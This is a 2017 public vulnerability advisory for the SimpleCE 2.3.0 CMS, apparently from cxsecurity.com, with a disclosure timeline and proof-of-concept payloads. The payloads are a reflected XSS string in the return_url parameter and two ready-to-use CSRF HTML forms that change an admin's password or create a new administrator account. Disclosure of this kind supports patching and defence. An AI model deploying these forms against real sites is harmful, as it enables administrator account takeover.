SimpleCE 2.3.0 Cross Site Request Forgery / Cross Site Scripting

2017.06.15
Credit: 8bitsec
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: SimpleCE 2.3.0 - Multiple Vulnerabilities XSS CSRF # Date: 2017-06-14 # Exploit Author: 8bitsec # Vendor Homepage: http://simplece.com # Software Link: https://codecanyon.net/item/simplece-v2-mini-cms/9140868 # Version: 2.3.0, probably older versions # Tested on: [Kali Linux 2.0 | Mac OS 10.12.5] # Email: contact@8bitsec.io # Contact: https://twitter.com/_8bitsec Release Date: ============= 2017-06-14 Product & Service Introduction: =============================== SimpleCE is a simple Content-Management System with front-end editor mode. Vulnerability Disclosure Timeline: ================================== 2017-06-13: Vulnerability found. 2017-06-13: Reported to vendor. 2017-06-14: No answer. 2017-06-14: Published. Technical Details & Description: ================================ Authenticated XSS vulnerability found on http://[server]/[path]/index.php/content/text/1?return_url=[XSS] exploitable as a regular or admin user. CSRF vulnerability can be exploited to add an administrator or change its info including password. Proof of Concept (PoC): ======================= XSS: http://[server]/[path]/index.php/content/text/1?return_url=<svg/onload=alert(/8bitsec/)> CSRF: Modify User: <form action="http://[server]/[path]/index.php/user/1" autocomplete="off" method="post" accept-charset="utf-8"> <label>Username<input type="text" name="username" id="username" placeholder="Username" value="admin" required="required" /></label> <label>Email<input type="email" name="email" id="email" placeholder="Email" value="mail@example.com" required="required" /></label> <label>Firstname<input type="text" name="firstname" id="firstname" placeholder="Firstname" value="John" /></label> <label>Surname<input type="text" name="surname" id="surname" placeholder="Surname" value="Doe" /></label> <label>Password<input type="password" name="password" id="password" placeholder="Password" /></label> <label>Password (repeat)<input type="password" name="password2" id="password2" placeholder="Password (repeat)"/></label> <button type="submit" name="save" id="save" value="save">save</button> </form> Add User: <form action="http://[server]/[path]/index.php/user/new" autocomplete="off" method="post" accept-charset="utf-8"> <label>Username<input type="text" name="username" id="username" placeholder="Username" value="adminuser" required="required" /></label> <label>Email<input type="email" name="email" id="email" placeholder="Email" value="a@b.com" required="required" /> <label>Firstname<input type="text" name="firstname" id="firstname" placeholder="Firstname" value="admin" /> <label>Surname<input type="text" name="surname" id="surname" placeholder="Surname" value="user" /></label> <label>Password<input type="password" name="password" id="password" placeholder="Password" required="required" /></label> <label>Password (repeat)<input type="password" name="password2" id="password2" placeholder="Password (repeat)" required="required" /></label> <label for="group">Role<select name="group" id="group" required="required"> <option value="2" >User</option> <option value="1" selected="selected">Admin</option> </select> </label> <button type="submit" name="save" id="save" value="save">save</button> </form> Credits & Authors: ================== 8bitsec - [https://twitter.com/_8bitsec]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top